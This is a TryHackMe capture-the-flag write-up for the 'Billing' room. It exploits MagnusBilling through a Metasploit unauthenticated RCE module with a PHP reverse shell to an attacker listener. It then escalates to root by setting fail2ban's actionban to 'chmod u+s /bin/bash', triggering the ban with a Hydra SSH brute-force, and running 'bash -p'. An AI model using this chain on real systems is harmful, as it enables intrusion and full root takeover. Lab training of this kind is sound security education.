TryHackMe : Billing
Billing is an intentionally vulnerable web application.
Connect the VPN and join the room.
Let’s start with some reconnaissance using Nmap tool.
nmap -v -sC -sV -A -O -p- -T5 -Pn 10.10.91.206
Let’s check the results.
The open ports are 22 (SSH), 80 (HTTP), 3306 (MySQL) and 5038 (Asterisk), shown in the above screenshot.
I did some directory listing on the web server, but nothing useful were found except robots.txt file.
The robots.txt shows /mbilling as a disallowed entry. Let’s search MagnusBilling (mbilling) exploits in Metasploit.
Found an unauthenticated RCE exploit for MagnusBilling application. Let’s use no.7, which has the PHP reverse shell payload and set module options like RHOSTS (web server IP address), LHOST (tun0 a.k.a THM VPN IP address), and LPORT (random port number of attacker machine, for reverse shell communication).
Finally run exploit command.
We have successfully exploited the vulnerable web machine. Let’s read the user flag.
Submit the user flag and let’s start digging on priv-esc for root flag. We have to acquire a fully functional shell. Run the below command and it will launch an interactive Bash shell.
execute -f bash -i
Then run the below mentioned command, which upgrades the previously acquired bash shell to a fully interactive TTY shell.
python3 ‘import pty;pty.spawn(“/bin/bash”)’
I tried to visiting directories like /var/backups, /var/log, /tmp etc. But nothing useful was found. So I ran the below command to list the commands a user can run with sudo privileges.
sudo -l
I found the fail2ban service (monitors system logs for malicious activity, such as repeated failed login attempts, and automatically blocks the offending IP addresses by updating firewall rules) which can be run by all users with sudo privilege.
I haven’t tried any exploitation on fail2ban service previously. So I had to look up on some blogs and write-ups related to the priv-esc using fail2ban service. Some references are mentioned below.
I tried to edit the fail2ban service log and configuration files and it wasn’t successful. So I looked up the switches for the fail2ban service. That’s when I found a switch which edits the iptables-multiport configuration file. The command which I used is
sudo fail2ban-client set sshd action iptables-multiport actionban “chmod u+s /bin/bash”
The above command instructs Fail2ban service to modify the sshd jail's actionban behavior, so that when an IP is banned, it also sets the setuid bit on /bin/bash, potentially granting any user executing it root privileges. Once the command is executed, restart the service using the command given below
sudo /usr/bin/fail2ban-client restart
When the fail2ban server is ready, execute the below mentioned command
ls -la /bin/bash
The above mentioned lists all files and directories (including hidden ones), specifically showing the attributes of the /bin/bash executable.
After all these steps, we have to brute-force SSH service using any tool. I used Hydra and also you can use any wordlist you want.
hydra -l root -P /usr/share/wordlists/john.lst 10.10.91.206 ssh
Once the brute-force attempt is finished, our IP address will be banned in the firewall. Which means, the previously mentioned actionban command executed. To confirm this, let’s go the previously acquired TTY shell and execute the below mentioned command
bash -p
The above command executes bash in privileged mode.
We have successfully elevated the user privileges to root privileges. Finally, read the root flag and submit it.
